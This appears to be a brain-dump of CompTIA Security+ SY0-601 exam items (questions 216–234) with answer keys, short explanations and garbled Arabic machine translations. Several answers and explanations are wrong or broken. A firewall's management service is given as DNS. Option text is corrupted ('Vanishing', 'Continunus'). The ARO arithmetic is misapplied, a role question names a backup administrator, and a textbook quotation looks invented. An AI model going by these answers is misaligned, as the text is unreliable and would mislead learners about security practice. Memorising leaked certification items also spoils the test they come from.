.‫مملوك مراجعة وتوقيع اتفاقية عدم إفشاء لحماية الملكية الفكرية والأسرار التجارية لفريق الأمن‬
109 / 198
The safer , easier way to help you pass any IT exams.
216.CORRECT TEXT
A company recently added a DR site and is redesigning the network. Users at the DR site are having
issues browsing websites.
INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
Hat any time you would like to bring back the initial state of the simulation, please dick the Reset All
button.
‫ مشكلات‬DR ‫ يواجه المستخدمون في موقع‬.‫ وتقوم بإعادة تصميم الشبكة‬DR ‫النص الصحيح أضافت شركة مؤخرا موقع‬.216
.‫في تصفح مواقع الويب‬
: ‫تعليمات‬
:‫انقر فوق كل جدار حماية للقيام بما يلي‬
‫رفض حركة مرور الويب للنص الواضح‬
.‫ضمان استخدام بروتوكولات الإدارة الآمنة‬
.DR ‫حل المشكلات في موقع‬
.‫لا يمكن تعديل ترتيب مجموعة القواعد بسبب القيود الخارجية‬
.‫ يرجى ديك زر إعادة تعيين الكل‬، ‫قبعة في أي وقت كنت ترغب في إعادة الحالة الأولية للمحاكاة‬
110 / 198
The safer , easier way to help you pass any IT exams.
111 / 198
The safer , easier way to help you pass any IT exams.
Answer:
In Firewall 1, HTTP inbound Action should be DENY. As shown below
‫ كما هو موضح أدناه‬.DENY ‫ هو‬HTTP ‫ يجب أن يكون الإجراء الوارد‬،1 ‫في جدار الحماية‬
112 / 198
The safer , easier way to help you pass any IT exams.
In Firewall 2, Management Service should be DNS, As shown below.
.‫ كما هو موضح أدناه‬، DNS ‫ يجب أن تكون خدمة الإدارة‬، 2 ‫في جدار الحماية‬
In Firewall 3, HTTP Inbound Action should be DENY, as shown below
.‫ كما هو موضح أدناه‬، DNS ‫ يجب أن تكون خدمة الإدارة‬، 2 ‫في جدار الحماية‬
113 / 198
The safer , easier way to help you pass any IT exams.
217.A security administrator is managing administrative access to sensitive systems with the following
requirements:
• Common login accounts must not be used for administrative duties.
• Administrative accounts must be temporal in nature.
• Each administrative account must be assigned to one specific user.
• Accounts must have complex passwords.
" Audit trails and logging must be enabled on all systems.
Which of the following solutions should the administrator deploy to meet these requirements? (Give
Explanation and References from CompTIA Security+ SY0-601 Official Text Book and Resources)
A. ABAC
B. SAML
C. PAM
D. CASB
Answer: C
Explanation:
PAM is a solution that enables organizations to securely manage users' accounts and access to
sensitive systems. It allows administrators to create unique and complex passwords for each user, as
well as assign each account to a single user for administrative duties. PAM also provides audit trails and
logging capabilities, allowing administrators to monitor user activity and ensure that all systems are
secure. According to the CompTIA Security+ SY0-601 Course Book, “PAM is the most comprehensive
way to control and monitor privileged accounts”.
‫ يجب عدم استخدام‬:‫ و يتولى مدير الأمن إدارة الوصول الإداري إلى الأنظمة الحساسة وفقا للمتطلبات التالية‬-217
‫ يجب تعيين كل‬.‫ يجب أن تكون الحسابات الإدارية مؤقتة بطبيعتها‬.‫حسابات تسجيل الدخول الشائعة للواجبات الإدارية‬
‫ " يجب تمكين مسارات التدقيق‬.‫ يجب أن تحتوي الحسابات على كلمات مرور معقدة‬.‫حساب إداري لمستخدم واحد محدد‬
‫ أي من الحلول التالية يجب على المسؤول نشرها لتلبية هذه المتطلبات؟ (أعط شرح‬.‫والتسجيل على جميع الأنظمة‬
‫ الكتاب المدرسي الرسمي والموارد) بام‬601-SY0 + Security CompTIA ‫ومراجع من‬
‫ يسمح‬.‫ هو حل يمكن المؤسسات من إدارة حسابات المستخدمين بأمان والوصول إلى الأنظمة الحساسة‬PAM :‫تفسير‬
‫ بالإضافة إلى تعيين كل حساب لمستخدم واحد للواجبات‬، ‫للمسؤولين بإنشاء كلمات مرور فريدة ومعقدة لكل مستخدم‬
‫ مما يسمح للمسؤولين بمراقبة نشاط المستخدم والتأكد‬، ‫ أيضا مسارات التدقيق وقدرات التسجيل‬PAM ‫ يوفر‬.‫الإدارية‬
‫ هي الطريقة الأكثر شمولا للتحكم‬PAM" ، 601-SY0 + Security CompTIA ‫ وفقا لكتاب دورة‬.‫من أن جميع الأنظمة آمنة‬
."‫في الحسابات المميزة ومراقبتها‬
114 / 198
The safer , easier way to help you pass any IT exams.
218.A company's help desk received several AV alerts indicating Mimikatz attempted to run on the
remote systems Several users also reported that the new company flash drives they picked up in the
break room only have 512KB of storage. Which of the following is most likely the cause?
A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts
the drives to only 512KB of storage
B. The new flash drives need a driver that is being blocked by the AV software because the flash drives
are not on the application's allow list, temporarily restricting the drives to 512KB of storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an
unapproved application to repartition the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is
attempting toharvest plaintext credentials from memory.
Answer: D
Explanation:
Mimikatz is a tool that can extract plaintext credentials from memory on Windows systems. A malicious
flash drive can bypass the GPO blocking the flash drives by using techniques such as autorun.inf or HID
spoofing to execute Mimikatz on the target system without user interaction or consent. This can cause
AV alerts indicating Mimikatz attempted to run on the remote systems and also reduce the storage
capacity of the flash drives to only 512KB by creating hidden partitions or files on them.
‫ حاول العمل على الأنظمة البعيدة وأبلغ‬Mimikatz ‫ تشير إلى أن‬AV ‫ تلقى مكتب المساعدة التابع لشركة ما عدة تنبيهات‬-218
‫العديد من المستخدمين أيضا أن محركات الأقراص المحمولة الجديدة للشركة التي التقطوها في غرفة الاستراحة لا تحتوي إلا‬
‫ أي من الآتي هو السبب الأرجح؟‬.‫ كيلوبايت من التخزين‬512 ‫على‬
‫ الذي يحظر محركات الأقراص المحمولة بواسطة محرك أقراص محمول ضار يحاول حصاد بيانات اعتماد النص‬GPO ‫يتم تجاوز‬
.‫العادي من الذاكرة‬
‫ يمكن لمحرك‬.Windows ‫ هي أداة يمكنها استخراج بيانات اعتماد النص العادي من الذاكرة على أنظمة‬Mimikatz :‫تفسير‬
HID ‫ أو انتحال‬inf.autorun ‫ الذي يحظر محركات الأقراص المحمولة باستخدام تقنيات مثل‬GPO ‫أقراص فلاش ضار تجاوز‬
‫ تشير إلى‬AV ‫ يمكن أن يتسبب هذا في حدوث تنبيهات‬.‫ على النظام الهدف دون تدخل المستخدم أو موافقته‬Mimikatz ‫لتنفيذ‬
‫ كيلوبايت‬512 ‫ للتشغيل على الأنظمة البعيدة وكذلك تقليل سعة تخزين محركات الأقراص المحمولة إلى‬Mimikatz ‫محاولة‬
.‫فقط عن طريق إنشاء أقسام أو ملفات مخفية عليها‬
115 / 198
The safer , easier way to help you pass any IT exams.
219. An employee's company email is configured with conditional access and requires that MFA is
enabled and used. An example of MFA is a phone call and:
A. a push notification
B. a password.
C. an SMS message.
D. an authentication application.
Answer: D
Explanation:
An authentication application can generate one-time passwords or QR codes that are time-based and
unique to each user and device. It does not rely on network connectivity or SMS delivery, which can be
intercepted or delayed. It also does not require the user to respond to a push notification, which can be
accidentally approved or ignored.
‫ مثال على‬.‫يتم تكوين البريد الإلكتروني لشركة الموظف بوصول مشروط ويتطلب تمكين المصادقة متعددة العوامل واستخدامها‬
.‫ تطبيق مصادقة‬:‫ هو مكالمة هاتفية و‬MFA
‫ لا يعتمد‬.‫ تعتمد على الوقت وفريدة لكل مستخدم وجهاز‬QR ‫ يمكن لتطبيق المصادقة إنشاء كلمات مرور لمرة واحدة أو رموز‬:‫تفسير‬
‫ كما أنه لا يتطلب من المستخدم الرد‬.‫ والتي يمكن أن تكون تم اعتراضها أو تأخيرها‬، ‫على اتصال الشبكة أو تسليم الرسائل القصيرة‬
.‫ والذي يمكن الموافقة عليه أو تجاهله عن طريق الخطأ‬، ‫على إشعار الدفع‬
220. Which of the following security design features can an development team to analyze the deletion
eoting Of data sets the copy?
A. Stored procedures
B. Code reuse
C. Version control
D. Continunus
Answer: C
Explanation:
Version control is a solution that can help a development team to analyze the deletion or editing of data
sets without affecting the original copy. Version control is a system that records changes to a file or set of
files over time so that specific versions can be recalled later. Version control can help developers track
and manage changes to code, data, or documents, as well as collaborate with other developers and
resolve conflicts.
‫أي من ميزات تصميم الأمان التالية يمكن لفريق التطوير تحليل حذف البيانات التي تحدد النسخة؟ التحكم في الإصدار‬
‫ يعد التحكم في الإصدار حلا يمكن أن يساعد فريق التطوير على تحليل حذف مجموعات البيانات أو تحريرها دون التأثير‬:‫تفسير‬
‫ التحكم في الإصدار هو نظام يسجل التغييرات التي تطرأ على ملف أو مجموعة من الملفات بمرور‬.‫على النسخة الأصلية‬
‫ يمكن أن يساعد التحكم في الإصدار المطورين على تعقب التغييرات التي‬.‫الوقت بحيث يمكن استدعاء إصدارات معينة لاحقا‬
‫ بالإضافة إلى التعاون مع المطورين الآخرين وحل‬،‫تطرأ على التعليمات البرمجية أو البيانات أو المستندات وإدارتها‬
.‫التعارضات‬
116 / 198
The safer , easier way to help you pass any IT exams.
221.A large bank with two geographically dispersed data centers Is concerned about major power
disruptions at Both locations. Every day each location experiences very brief outages thai last (or a few
seconds. However, during the summer a high risk of intentional under-voltage events that could last up
to an hour exists, particularly at one of the locations near an industrial smelter.
Which of the following is the BEST solution to reduce the risk of data loss?
A. Dual supply
B. Generator
C. PDU
D. Dally backups
Answer: B
Explanation:
A generator will provide uninterrupted power to the data centers, ensuring that they are not affected by
any power disruptions, intentional or otherwise. This is more reliable than a dual supply or a PDU, and
more effective than daily backups, which would not be able to protect against an outage lasting an hour.
‫ كل يوم يواجه كل موقع‬.‫ ويساور مصرف كبير يضم مركزين للبيانات متفرقين جغرافيا القلق إزاء انقطاع التيار الكهربائي في كلا الموقعين‬-221
‫ يوجد خطر كبير من أحداث الجهد المنخفض المتعمدة‬، ‫ خلال فصل الصيف‬، ‫ ومع ذلك‬.‫انقطاعات قصيرة جدا التايلاندية الماضي (أو بضع ثوان‬
‫ أي مما يلي هو أفضل حل لتقليل مخاطر فقدان‬.‫ لا سيما في أحد المواقع القريبة من مصهر صناعي‬، ‫التي يمكن أن تستمر لمدة تصل إلى ساعة‬
‫البيانات؟ مولد‬
‫ هذا أكثر موثوقية‬.‫ متعمدا أو غير ذلك‬، ‫ مما يضمن عدم تأثرها بأي انقطاع في الطاقة‬، ‫ سيوفر المولد طاقة غير منقطعة لمراكز البيانات‬:‫تفسير‬
‫ والتي لن تكون قادرة على الحماية من انقطاع التيار الكهربائي لمدة‬، ‫ وأكثر فعالية من النسخ الاحتياطية اليومية‬، PDU ‫من الإمداد المزدوج أو‬
.‫ساعة‬
222.Which of the following describes software on network hardware that needs to be updated on a
routine basis to help address possible vulnerabilities?
A. Vendor management
B. Application programming interface
C. Vanishing
D. Encryption strength
E. Firmware
Answer: E
Explanation:
Firmware is software that allows your computer to communicate with hardware devices, such as network
routers, switches, or firewalls. Firmware updates can fix bugs, improve performance, and enhance
security features. Without firmware updates, the devices you connect to your network might not work
properly or might be vulnerable to attacks1. You can have Windows automatically download
recommended drivers and firmware updates for your hardware devices1, or you can use a network
monitoring software to keep track of the firmware status of your devices2. You should also follow the best
practices for keeping devices and software up to date, such as enforcing automatic updates, monitoring
update status, and testing updates before deploying them
‫أي مما يلي يصف البرمجيات الموجودة على أجهزة الشبكة والتي تحتاج إلى تحديث روتيني للمساعدة في معالجة مواطن الضعف المحتملة؟‬.222
‫البرامج الثابته‬
‫ يمكن لتحديثات‬.‫ مثل أجهزة توجيه الشبكة أو المحولات أو جدران الحماية‬،‫ البرنامج الثابت هو برنامج يسمح للكمبيوتر بالاتصال بالأجهزة‬:‫تفسير‬
‫ قد لا تعمل الأجهزة التي تتصل بشبكتك بشكل‬،‫ بدون تحديثات البرامج الثابتة‬.‫البرامج الثابتة إصلاح الأخطاء وتحسين الأداء وتحسين ميزات الأمان‬
‫ أو‬،1‫ يقوم تلقائيا بتنزيل برامج التشغيل الموصى بها وتحديثات البرامج الثابتة لأجهزتك‬Windows ‫ يمكنك جعل‬.1‫صحيح أو قد تكون عرضة للهجمات‬
‫ يجب عليك أيضا اتباع أفضل الممارسات للحفاظ على تحديث الأجهزة‬.2‫يمكنك استخدام برنامج مراقبة الشبكة لتعقب حالة البرنامج الثابت لأجهزتك‬
‫ مثل فرض التحديثات التلقائية ومراقبة حالة التحديث واختبار التحديثات قبل نشرها‬، ‫والبرامج‬
117 / 198
The safer , easier way to help you pass any IT exams.
223.A security team discovered a large number of company-issued devices with non-work-related
software installed. Which of the following policies would most likely contain language that would prohibit
this activity?
A. NDA
B. BPA
C. AUP
D. SLA
Answer: C
Explanation:
AUP stands for acceptable use policy, which is a document that defines the rules and guidelines for
using an organization’s network, systems, devices, and resources. An AUP typically covers topics such
as authorized and unauthorized activities, security requirements, data protection, user responsibilities,
and consequences for violations. An AUP can help prevent non-work-related software installation on
company-issued devices by clearly stating what types of software are allowed or prohibited, and what
actions will be taken if users do not comply with the policy.
‫ أي من السياسات التالية‬.‫ اكتشف فريق أمني عددا كبيرا من الأجهزة التي أصدرتها الشركة مع تثبيت برامج غير متعلقة بالعمل‬-223
‫ستحتوي على الأرجح على لغة تحظر هذا النشاط؟ اوب‬
‫ وهي وثيقة تحدد القواعد والإرشادات لاستخدام شبكة المؤسسة وأنظمتها‬، ‫ إلى سياسة الاستخدام المقبول‬AUP ‫ يرمز‬:‫تفسير‬
‫ ومتطلبات‬، ‫ يغطي سياسة الاستخدام المقبول عادة موضوعات مثل الأنشطة المصرح بها وغير المصرح بها‬.‫وأجهزتها ومواردها‬
‫ يمكن أن تساعد سياسة الاستخدام المقبول في منع تثبيت‬.‫ وعواقب الانتهاكات‬، ‫ ومسؤوليات المستخدم‬، ‫ وحماية البيانات‬، ‫الأمان‬
،‫البرامج غير المتعلقة بالعمل على الأجهزة الصادرة عن الشركة من خلال تحديد أنواع البرامج المسموح بها أو المحظورة بوضوح‬
.‫والإجراءات التي سيتم اتخاذها إذا لم يمتثل المستخدمون للسياسة‬
224. Which of the following is most likely to contain ranked and ordered information on the likelihood and
potential impact of catastrophic events that may affect business processes and systems, while also
highlighting the residual risks that need to be managed after mitigating controls have been implemented?
A. An RTO report
B. A risk register
C. A business impact analysis
D. An asset value register
E. A disaster recovery plan
Answer: B
Explanation:
A risk register is a document or a tool that records and tracks information about the identified risks and
their analysis, such as likelihood, impact, priority, mitigation strategies, residual risks, etc. It can contain
ranked and ordered information on the likelihood and potential impact of catastrophic events that may
affect business processes and systems, while also highlighting the residual risks that need to be
managed after mitigating controls have been implemented.
‫أي مما يلي من المرجح أن يحتوي على معلومات مرتبة ومرتبة حول احتمالية وتأثير الأحداث الكارثية التي قد تؤثر على‬
‫ مع تسليط الضوء أيضا على المخاطر المتبقية التي يجب إدارتها بعد تنفيذ ضوابط التخفيف؟‬، ‫العمليات والأنظمة التجارية‬
‫سجل المخاطر‬
‫ مثل الاحتمال والتأثير‬، ‫ سجل المخاطر هو وثيقة أو أداة تسجل وتتعقب المعلومات حول المخاطر المحددة وتحليلها‬:‫تفسير‬
‫ يمكن أن يحتوي على معلومات مرتبة ومرتبة حول احتمالية‬.‫والأولوية واستراتيجيات التخفيف والمخاطر المتبقية وما إلى ذلك‬
‫ مع تسليط الضوء أيضا على المخاطر المتبقية التي‬، ‫وتأثير الأحداث الكارثية التي قد تؤثر على العمليات والأنظمة التجارية‬
.‫يجب إدارتها بعد تنفيذ ضوابط التخفيف‬
118 / 198
The safer , easier way to help you pass any IT exams.
225. An analyst is working on an investigation with multiple alerts for multiple hosts. The hosts are
showing signs of being compromised by a fast-spreading worm. Which of the following should
be the next step in order to stop the spread?
A. Disconnect every host from the network.
B. Run an AV scan on the entire
C. Scan the hosts that show signs of
D. Place all known-infected hosts on an isolated network
Answer: D
Explanation:
Placing all known-infected hosts on an isolated network is the best way to stop the spread of a worm
infection. This will prevent the worm from reaching other hosts on the network and allow the infected
hosts to be cleaned and restored. Disconnecting every host from the network is not practical and may
disrupt business operations. Running an AV scan on the entire network or scanning the hosts that show
signs of infection may not be effective or fast enough to stop a fast-spreading worm.
‫ يظهر المضيفون علامات على تعرضهم للخطر من قبل دودة‬.‫يعمل المحلل على تحقيق مع تنبيهات متعددة لمضيفين متعددين‬
‫ أي مما يلي يجب أن يكون الخطوة التالية لوقف السبريد؟ وضع جميع المضيفين المصابين المعروفين على شبكة‬.‫سريعة الانتشار‬
‫معزولة‬
‫ سيمنع هذا‬.‫ يعد وضع جميع المضيفين المصابين المعروفين على شبكة معزولة أفضل طريقة لوقف انتشار عدوى الدودة‬:‫تفسير‬
‫ إن فصل كل‬.‫الفيروس المتنقل من الوصول إلى مضيفين آخرين على الشبكة ويسمح بتنظيف المضيفين المصابين واستعادتهم‬
‫ على الشبكة بأكملها أو فحص‬AV ‫ قد لا يكون تشغيل فحص‬.‫مضيف عن الشبكة ليس عمليا وقد يعطل العمليات التجارية‬
.‫المضيفين الذين تظهر عليهم علامات العدوى فعالا أو سريعا بما يكفي لإيقاف دودة سريعة الانتشار‬
226. After installing a patch On a security appliance. an organization realized a massive data exfiltration
occurred.Which Of the following describes the incident?
A. Supply chain attack
B. Ransomware attack
C. Cryptographic attack
D. Password attack
Answer: A
Explanation:
A supply chain attack is a type of attack that involves compromising a trusted third-party provider or
vendor and using their products or services to deliver malware or gain access to the target organization.
The attacker can exploit the trust and dependency that the organization has on the provider or vendor
and bypass their security controls. In this case, the attacker may have tampered with the patch for the
security appliance and used it to exfiltrate data from the organization.
‫ أي مما يلي يصف الحادثة؟‬.‫ أدركت إحدى المنظمات حدوث تسرب هائل للبيانات‬.‫بعد تثبيت التصحيح على جهاز الأمان‬
‫هجوم سلسلة التوريد‬
‫ هجوم سلسلة التوريد هو نوع من الهجمات التي تنطوي على اختراق مزود أو بائع موثوق به تابع لجهة خارجية واستخدام‬:‫تفسير‬
‫ يمكن للمهاجم استغلال الثقة والتبعية التي تتمتع بها‬.‫منتجاته أو خدماته لتقديم برامج ضارة أو الوصول إلى المؤسسة المستهدفة‬
‫ ربما يكون المهاجم قد عبث بالتصحيح‬، ‫ في هذه الحالة‬.‫المؤسسة على الموفر أو المورد وتجاوز عناصر التحكم الأمنية الخاصة بهم‬
.‫الخاص بجهاز الأمان واستخدمه لاستخراج البيانات من المؤسسة‬
119 / 198
The safer , easier way to help you pass any IT exams.
227.A network administrator needs to determine the sequence of a server farm's logs.
Which of the following should the administrator consider? (Select two).
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: D,F
Explanation:
A server farm’s logs are records of events that occur on a group of servers that provide the same service
or function. Logs can contain information such as date, time, source, destination, message, error code,
and severity level. Logs can help administrators monitor the performance, security, and availability of the
servers and troubleshoot any issues.
To determine the sequence of a server farm’s logs, the administrator should consider the following
factors:
✑ Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can
help administrators sort and correlate events across different servers based on chronological order.
However, time stamps alone may not be sufficient to determine the sequence of events if the servers
have different time zones or clock settings.
✑ Time offset: Time offset is the difference between the local time of a server and a reference time,
such as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help
administrators adjust and synchronize the time stamps of different servers to a common reference time
and eliminate any discrepancies caused by time zones or clock settings.
.)‫ أي مما يلي يجب على المسؤول مراعاته؟ (حدد اثنين‬.‫يحتاج مسؤول الشبكة إلى تحديد تسلسل سجلات مزرعة الخوادم‬.227
‫الطوابع الزمنية _ إزاحة الوقت‬
‫ سجلات مزرعة الخوادم هي سجلات للأحداث التي تحدث على مجموعة من الخوادم التي توفر نفس الخدمة أو‬:‫تفسير‬
‫ ومستوى‬، ‫ يمكن أن تحتوي السجلات على معلومات مثل التاريخ والوقت والمصدر والوجهة والرسالة ورمز الخطأ‬.‫الوظيفة‬
.‫ يمكن أن تساعد السجلات المسؤولين في مراقبة أداء الخوادم وأمانها وتوافرها واستكشاف أي مشكلات وإصلاحها‬.‫الخطورة‬
‫ الطوابع الزمنية هي‬:‫ ✑ الطوابع الزمنية‬:‫ يجب على المسؤول مراعاة العوامل التالية‬،‫لتحديد تسلسل سجلات مزرعة الخوادم‬
‫ يمكن الطوابع الزمنية ساعد المسؤولين على فرز الأحداث وربطها عبر خوادم‬.‫مؤشرات على وقت وقوع حدث على الخادم‬
‫ قد لا تكون الطوابع الزمنية وحدها كافية لتحديد تسلسل الأحداث إذا كانت‬، ‫ ومع ذلك‬.‫مختلفة استنادا إلى الترتيب الزمني‬
‫ إزاحة الوقت هي الفرق بين التوقيت المحلي‬:‫ ✑ إزاحة الوقت‬.‫الخوادم تحتوي على مناطق زمنية أو إعدادات ساعة مختلفة‬
‫ يمكن أن يساعد إزاحة الوقت‬.)GMT( ‫) أو توقيت غرينتش‬UTC( ‫ مثل التوقيت العالمي المنسق‬،‫للخادم والوقت المرجعي‬
‫المسؤولين على ضبط ومزامنة الطوابع الزمنية للخوادم المختلفة مع وقت مرجعي مشترك والقضاء على أي تناقضات ناتجة‬
.‫عن المناطق الزمنية أو إعدادات الساعة‬
120 / 198
The safer , easier way to help you pass any IT exams.
228.HOTSPOT
A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.
INSTRUCTIONS
Please click on the below items on the network diagram and configure them accordingly:
✑ WAP
✑ DHCP Server
✑ AAA Server
✑ Wireless Controller
✑ LDAP Server
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
‫هوت سبوت‬.228
.‫ للشركة المشتراة حديثا بأكثر الطرق أمانا‬WAP ‫يجب تكوين‬
:‫ يرجى النقر فوق العناصر أدناه في مخطط الشبكة وتكوينها وفقا لذلك‬:‫تعليمات‬
‫ ✑ وحدة تحكم لاسلكية ✑ خادم‬AAA ‫ ✑ خادم‬DHCP ‫✑ الواب ✑ خادم‬
.‫ فالرجاء النقر فوق إعادة تعيين الكل زر‬، ‫ إذا كنت ترغب في أي وقت في إعادة الحالة الأولية للمحاكاة‬LDAP
121 / 198
The safer , easier way to help you pass any IT exams.
Answer:
Explanation:
Wireless Access Point
Network Mode – G only
Wireless Channel – 11
Wireless SSID Broadcast – disable
Security settings – WPA2 Professional
122 / 198
The safer , easier way to help you pass any IT exams.
229.A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on
previously defined attacks. The engineer wants a tool that can monitor for changes to key files and
network traffic for the device. Which of the following tools should the engineer select?
A. HIDS
B. AV
C. NGF-W
D. DLP
Answer: A
Explanation:
The security engineer should select a Host Intrusion Detection System (HIDS) to address the concern.
HIDS monitors and analyzes the internals of a computing system, such as key files and network traffic,
for any suspicious activity. Unlike antivirus software (AV), which relies on known signatures of malware,
HIDS can detect anomalies, policy violations, and previously undefined attacks by monitoring system
behavior and the network traffic of the device.
‫ويساور أحد مهندسي الأمن القلق من أن استراتيجية الكشف عن النقاط الطرفية تعتمد اعتمادا كبيرا على الهجمات‬-229
.‫ يريد المهندس أداة يمكنها مراقبة التغييرات التي تطرأ على الملفات الرئيسية وحركة مرور الشبكة للجهاز‬.‫المحددة سابقا‬
‫أي من الأدوات التالية يجب أن يختارها المهندس؟ مخابئ‬
‫ ويحلل‬HIDS ‫ يراقب‬.‫) لمعالجة المشكلة‬HIDS( ‫ يجب على مهندس الأمن اختيار نظام كشف التسلل المضيف‬:‫تفسير‬
‫ على عكس‬.‫ بحثا عن أي نشاط مشبوه‬، ‫ مثل الملفات الرئيسية وحركة مرور الشبكة‬، ‫الأجزاء الداخلية لنظام الحوسبة‬
‫ اكتشاف الحالات‬HIDS ‫ يمكن ل‬، ‫ التي تعتمد على التوقيعات المعروفة للبرامج الضارة‬، )AV( ‫برامج مكافحة الفيروسات‬
‫الشاذة وانتهاكات السياسة والهجمات غير المحددة سابقا من خلال مراقبة سلوك النظام وحركة مرور الشبكة للجهار‬
123 / 198
The safer , easier way to help you pass any IT exams.
230.CORRECT TEXT
A systems administrator needs to install a new wireless network for authenticated guest access. The
wireless network should support 802. IX using the most secure encryption and protocol available.
Perform the following steps:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest. The guest AD credentials are:
User: guest01
Password: guestpass
IX .802 ‫ يجب أن تدعم الشبكة اللاسلكية‬.‫تصحيح النص يحتاج مسؤول النظام إلى تثبيت شبكة لاسلكية جديدة للوصول الضيف المصادق عليه‬.230
‫ قم بتكوين العميل‬.WiFi ‫ تكوين وحدة تحكم‬.RADIUS ‫ تكوين خادم‬:‫ قم بتنفيذ الخطوات التالية‬.‫باستخدام التشفير والبروتوكول الأكثر أمانا المتاح‬
guestpass :‫ كلمة المرور‬guest01 :‫ المستخدم‬:‫ الضيف هي‬AD ‫ بيانات اعتماد‬.‫مسبقا لضيف وارد‬
Answer:
Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10
Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20
Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
124 / 198
The safer , easier way to help you pass any IT exams.
231. An organization has been experiencing outages during holiday sales and needs to ensure
availability of its point-of-sales systems. The IT administrator has been asked to improve
both server-data fault tolerance and site availability under high consumer load.
Which of the following are the best options to accomplish this objective? (Select two.)
A. Load balancing
B. Incremental backups
C. UPS
D. RAID
E. Dual power supply
F. VLAN
Answer: A,D
Explanation:
Load balancing and RAID are the best options to accomplish the objective of improving both server-data
fault tolerance and site availability under high consumer load. Load balancing is a method of distributing
network traffic across multiple servers to optimize performance, reliability, and scalability.
‫ طلب من‬.‫تعاني المؤسسة من انقطاع التيار الكهربائي أثناء مبيعات العطلات وتحتاج إلى ضمان توفر أنظمة نقاط البيع الخاصة بها‬
‫ أي من‬.‫مسؤول تكنولوجيا المعلومات التحسين كل من التسامح مع خطأ بيانات الخادم وتوافر الموقع تحت الحمل العالي للمستهلك‬
‫) موازنة الحمل _ ريد‬.‫الآتي أفضل الخيارات لتحقيق هذا الهدف؟ (حدد اثنين‬
‫ أفضل الخيارات لتحقيق هدف تحسين كل من التسامح مع أخطاء بيانات الخادم وتوافر الموقع‬RAID ‫ تعد موازنة التحميل و‬:‫تفسير‬
‫ موازنة التحميل هي طريقة لتوزيع حركة مرور الشبكة عبر خوادم متعددة لتحسين الأداء‬.‫في ظل الحمل العالي للمستهلك‬
.‫والموثوقية وقابلية التوسع‬
232. An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Answer: C
Explanation:
The role that would most likely include the responsibilities of implementing technical controls to protect
data and ensuring backups are properly maintained would be a Backup Administrator.
، ‫يقوم كبير مسؤولي أمن المعلومات في المؤسسة بإنشاء منصب يكون مسؤولا عن تنفيذ الضوابط الفنية لحماية البيانات‬
‫ أي من الأدوار التالية سيشمل على الأرجح هذه المسؤوليات؟‬.‫بما في ذلك ضمان الحفاظ على النسخ الاحتياطية بشكل صحيح‬
‫مسؤول النسخ الاحتياطي‬
‫ الدور الذي من المرجح أن يشمل مسؤوليات تنفيذ الضوابط الفنية لحماية البيانات وضمان صيانة النسخ الاحتياطية‬:‫تفسير‬
‫بشكل صحيح سيكون مسؤول النسخ الاحتياطي‬
125 / 198
The safer , easier way to help you pass any IT exams.
233. An IT manager is estimating the mobile device budget for the upcoming year. Over the last five
years, the number of devices that were replaced due to loss, damage, or theft steadily increased by
10%.
Which of the following would best describe the estimated number of devices to be replaced next year?
A. SLA
B. ARO
C. RPO
D. SLE
Answer: B
Explanation:
ARO stands for annualized rate of occurrence, which is a metric that estimates how often a threat event
will occur within a year. ARO can help an IT manager estimate the mobile device budget for the
upcoming year by multiplying the number of devices replaced in the previous year by the percentage
increase of replacement over the last five years. For example, if 100 devices were replaced in the
previous year and the replacement rate increased by 10% each year for the last five years, then the
estimated number of devices to be replaced next year is 100 x (1 + 0.1)^5 = 161.
‫ زاد عدد الأجهزة التي تم‬، ‫ على مدى السنوات الخمس الماضية‬.‫يقوم مدير تكنولوجيا المعلومات بتقدير ميزانية الجهاز المحمول للعام المقبل‬
‫ أي من الآتي يصف العدد المقدر للأجهزة التي سيتم استبدالها العام المقبل؟ ارو‬.٪10 ‫استبدالها بسبب الفقد أو التلف أو السرقة بشكل مطرد بنسبة‬
ARO ‫ يمكن أن يساعد‬.‫ وهو مقياس يقدر عدد المرات التي سيحدث فيها حدث تهديد في غضون عام‬، ‫ تعني معدل الحدوث السنوي‬ARO :‫تفسير‬
‫مدير تكنولوجيا المعلومات في تقدير ميزانية الجهاز المحمول ل العام المقبل بضرب عدد الأجهزة التي تم استبدالها في العام السابق في النسبة‬
‫ جهاز في العام السابق وزاد معدل الاستبدال‬100 ‫ إذا تم استبدال‬، ‫ على سبيل المثال‬.‫المئوية لزيادة الاستبدال على مدى السنوات الخمس الماضية‬
.161 = 5 ^ )0.1 + 1( × 100 ‫ فإن العدد المقدر للأجهزة التي سيتم استبدالها العام المقبل هو‬، ‫ كل عام على مدار السنوات الخمس الماضية‬٪10 ‫بنسبة‬
234. An organization routes all of its traffic through a VPN Most users are remote and connect into a
corporate data center that houses confidential information There is a firewall at the internet border,
followed by a DLP appliance, the VPN server and the data center itself.
Which of the following is the weakest design element?
A. The DLP appliance should be integrated into a NGFW.
B. Split-tunnel connections can negatively impact the DLP appliance's performance.
C. Encrypted VPN traffic will not be inspected when entering or leaving the network.
D. Adding two hops in the VPN tunnel may slow down remote connections
Answer: C
Explanation:
VPN (Virtual Private Network) traffic is encrypted to protect its confidentiality and integrity over the
internet. However, this also means that it cannot be inspected by security devices or tools when entering
or leaving the network, unless it is decrypted first. This can create a blind spot or a vulnerability for the
network security posture, as malicious traffic or data could bypass detection or prevention mechanisms
by using VPN encryption.
